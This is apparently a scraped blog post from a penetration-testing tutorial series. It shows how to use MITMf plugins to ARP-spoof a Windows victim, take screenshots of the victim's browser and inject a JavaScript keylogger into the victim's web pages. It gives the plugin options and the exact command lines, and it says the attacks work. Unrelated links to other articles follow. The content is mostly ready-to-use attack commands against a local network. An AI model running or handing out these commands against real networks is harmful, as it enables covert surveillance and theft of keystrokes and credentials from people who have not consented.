MITM - Capturing Screen Of Target & Injecting a Keylogger

ScreenShotter Plugin:

ScreenShotter:

  Uses HTML5 Canvas to render an accurate screenshot of a clients browser

  --screen              Load plugin 'ScreenShotter'

  --interval SECONDS    Interval at which screenshots will be taken (default 10 seconds)

Inject Plugin:

Inject:

  Inject arbitrary content into HTML content

  --inject              Load plugin 'Inject'

  --js-url JS_URL       URL of the JS to inject

  --js-payload JS_PAYLOAD

                        JS string to inject

  --js-file JS_FILE     File containing JS to inject

  --html-url HTML_URL   URL of the HTML to inject

  --html-payload HTML_PAYLOAD

                        HTML string to inject

  --html-file HTML_FILE

                        File containing HTML to inject

  --per-domain          Inject once per domain per client.

  --rate-limit RATE_LIMIT

                        Inject once every RATE_LIMIT seconds per client.

  --count-limit COUNT_LIMIT

                        Inject only COUNT_LIMIT times per client.

  --white-ips IP        Inject content ONLY for these ips (comma seperated)

  --black-ips IP        DO NOT inject content for these ips (comma seperated)

  --white-domains DOMAINS

                        Inject content ONLY for these domains (comma seperated)

  --black-domains DOMAINS

                        DO NOT inject content for these domains (comma seperated)

Test the ScreenShotter on Victim Windows PC.

python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --targets 10.0.0.22 -i eth0 --screen

It works perfectly.

JSKeylogger Plugin:

JSKeylogger:

  Injects a javascript keylogger into clients webpages

  --jskeylogger         Load plugin 'JSKeylogger'

Usage:

python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --target 10.0.0.22 -i eth0 --jskeylogger

It works...

Ethical Hacking - NETWORK PENETRATION TESTING(20)的更多相关文章

  1. Ethical Hacking - NETWORK PENETRATION TESTING(15)

    ARP Poisoning - arpspoof Arpspoof is a tool part of a suit called dsniff, which contains a number of ...

  2. Ethical Hacking - NETWORK PENETRATION TESTING(22)

    MITM - Wireshark WIreshark is a network protocol analyser that is designed to help network administa ...

  3. Ethical Hacking - NETWORK PENETRATION TESTING(14)

    MITM - ARP Poisoning Theory Man In The Middle Attacks - ARP Poisoning This is one of the most danger ...

  4. Ethical Hacking - NETWORK PENETRATION TESTING(13)

    Nmap Nmap is a network discovery tool that can be used to gather detailed information about any clie ...

  5. Ethical Hacking - NETWORK PENETRATION TESTING(12)

    Post Connection Attacks Sophisticated attacks that can be used after connecting to the target AP. Ga ...

  6. Ethical Hacking - NETWORK PENETRATION TESTING(11)

    Securing your Network From the Above Attacks. Now that we know how to test the security of all known ...

  7. Ethical Hacking - NETWORK PENETRATION TESTING(10)

    WPA Craking WPA was designed to address the issues in WEP and provide better encryption. The main is ...

  8. Ethical Hacking - NETWORK PENETRATION TESTING(8)

    WEP Cracking Basic case Run airdump-ng to log all traffic from the target network. airodump-ng --cha ...

  9. Ethical Hacking - NETWORK PENETRATION TESTING(7)

    Gaining Access to encrypted networks Three main encryption types: 1. WEP 2.WPA 3.WPA2 WEP Cracking W ...

随机推荐

  1. Spring Data 教程 - Redis

    1. Redis简介 Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写.支持网络.可基于内存亦可持久化的日志型.Key-Value ...

  2. EM(最大期望)算法推导、GMM的应用与代码实现

    EM算法是一种迭代算法,用于含有隐变量的概率模型参数的极大似然估计. 使用EM算法的原因 首先举李航老师<统计学习方法>中的例子来说明为什么要用EM算法估计含有隐变量的概率模型参数. 假设 ...

  3. Area.js下载

    因为vant AddressEdit 地址编辑的必要组件area.js网站经常进不去,所以存在这里,area.js 代码如下: export default { province_list: { 11 ...

  4. 原生PHP连接MySQL数据库

    <?php //1.连接数据库 // mysqli_connect('主机名','用户名','密码'); $link = @mysqli_connect('localhost','usernam ...

  5. Object.defineProperty()更改对象中的函数

    这个方法可以修改javascript中的对象的属性值,但是例子只讲了如何修改对象中的属性值,却没有讲如何修改对象里面的方法,所以这里补充下: 例子代码如下: <!DOCTYPE html> ...

  6. vue基础入门(2.3)

    2.3.样式绑定 2.3.1.绑定class样式 1.绑定单个class <!DOCTYPE html> <html lang="en"> <head ...

  7. 深入探究ASP.NET Core异常处理中间件

    前言     全局异常处理是我们编程过程中不可或缺的重要环节.有了全局异常处理机制给我们带来了很多便捷,首先我们不用满屏幕处理程序可能出现的异常,其次我们可以对异常进行统一的处理,比如收集异常信息或者 ...

  8. 如何完美获得一个double值的整数部分

    如果是java有float类型的向上取整:Math.ceil() //只要有小数都+1向下取整:Math.floor() //不取小数四舍五入:Math.round() //四舍五入 如果是C++:方 ...

  9. codeforce 796C - Bank Hacking(无根树+思维)

    题目 Although Inzane successfully found his beloved bone, Zane, his owner, has yet to return. To searc ...

  10. EntityFramework Core 迁移忽略主外键关系

    前言 本文来源于一位公众号童鞋私信我的问题,在我若加思索后给出了其中一种方案,在此之前我也思考过这个问题,借此机会我稍微看了下,目前能够想到的也只是本文所述方案. 为何要忽略主外键关系 我们不仅疑惑为 ...